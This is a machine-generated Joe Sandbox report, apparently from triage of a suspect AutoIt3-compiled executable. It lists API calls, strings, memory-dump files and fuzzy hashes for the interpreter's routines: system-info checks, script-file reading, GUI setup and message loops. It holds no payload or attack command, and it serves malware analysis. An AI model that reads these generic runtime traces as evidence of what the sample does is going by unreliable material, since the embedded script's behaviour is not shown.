                                                    control_flow_graph 1187 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1196 40e582-40e583 1187->1196 1197 427674-427679 1187->1197 1200 40e585-40e596 1196->1200 1201 40e5ba-40e5cb call 40ef60 1196->1201 1198 427683-427686 1197->1198 1199 42767b-427681 1197->1199 1203 427693-427696 1198->1203 1204 427688-427691 1198->1204 1202 4276b4-4276be 1199->1202 1205 427625-427629 1200->1205 1206 40e59c-40e59f 1200->1206 1219 40e5ec-40e60c 1201->1219 1220 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1201->1220 1221 4276c6-4276ca GetSystemInfo 1202->1221 1203->1202 1210 427698-4276a8 1203->1210 1204->1202 1212 427636-427640 1205->1212 1213 42762b-427631 1205->1213 1208 40e5a5-40e5ae 1206->1208 1209 427654-427657 1206->1209 1215 40e5b4 1208->1215 1216 427645-42764f 1208->1216 1209->1201 1214 42765d-42766f 1209->1214 1217 4276b0 1210->1217 1218 4276aa-4276ae 1210->1218 1212->1201 1213->1201 1214->1201 1215->1201 1216->1201 1217->1202 1218->1202 1222 40e612-40e623 call 40efd0 1219->1222 1223 4276d5-4276df GetSystemInfo 1219->1223 1220->1219 1230 40e5e8 1220->1230 1221->1223 1222->1221 1229 40e629-40e63f call 40ef90 GetNativeSystemInfo 1222->1229 1233 40e641-40e642 FreeLibrary 1229->1233 1234 40e644-40e651 1229->1234 1230->1219 1233->1234 1235 40e653-40e654 FreeLibrary 1234->1235 1236 40e656-40e65d 1234->1236 1235->1236
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                    • String ID: 0SH$#v
                                                    • API String ID: 3363477735-2448020801
                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsThemeActive$uxtheme.dll
                                                    • API String ID: 2574300362-3542929980
                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FreeInfoLibraryParametersSystem
                                                    • String ID: #v
                                                    • API String ID: 3403648963-554117064
                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                    • API String ID: 1762048999-758534266
                                                    • Opcode ID: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                    • Opcode Fuzzy Hash: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                    • _fseek.LIBCMT ref: 00452B3B
                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                    • _wcscat.LIBCMT ref: 00452C07
                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                    • String ID:
                                                    • API String ID: 2054058615-0
                                                    • Opcode ID: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                    • Opcode Fuzzy Hash: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                    • API String ID: 0-1896584978
                                                    • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                    • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                    • API String ID: 3948761352-1609664196
                                                    • Opcode ID: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                    • Opcode Fuzzy Hash: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • _wcscat.LIBCMT ref: 00427541
                                                    • _wcslen.LIBCMT ref: 00427551
                                                    • _wcslen.LIBCMT ref: 00427562
                                                    • _wcscat.LIBCMT ref: 0042757C
                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                    • String ID: Include$\
                                                    • API String ID: 3173733714-3429789819
                                                    • Opcode ID: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                    • Opcode Fuzzy Hash: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                    Control-flow Graph

                                                    APIs
                                                    • _fseek.LIBCMT ref: 0045292B
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                    • _fseek.LIBCMT ref: 004529BF
                                                    • _malloc.LIBCMT ref: 004529CA
                                                    • _malloc.LIBCMT ref: 004529D6
                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                    • _free.LIBCMT ref: 00452A17
                                                    • _free.LIBCMT ref: 00452A20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                    • String ID:
                                                    • API String ID: 1255752989-0
                                                    • Opcode ID: 114473c931f5864b7972cc14d9affea6952a965592177bd362f259b4ea80f327
                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                    • Opcode Fuzzy Hash: 114473c931f5864b7972cc14d9affea6952a965592177bd362f259b4ea80f327
                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                    • String ID: FILE
                                                    • API String ID: 3888824918-3121273764
                                                    • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                    • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                    • ImageList_ReplaceIcon.COMCTL32(00AEF6D8,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
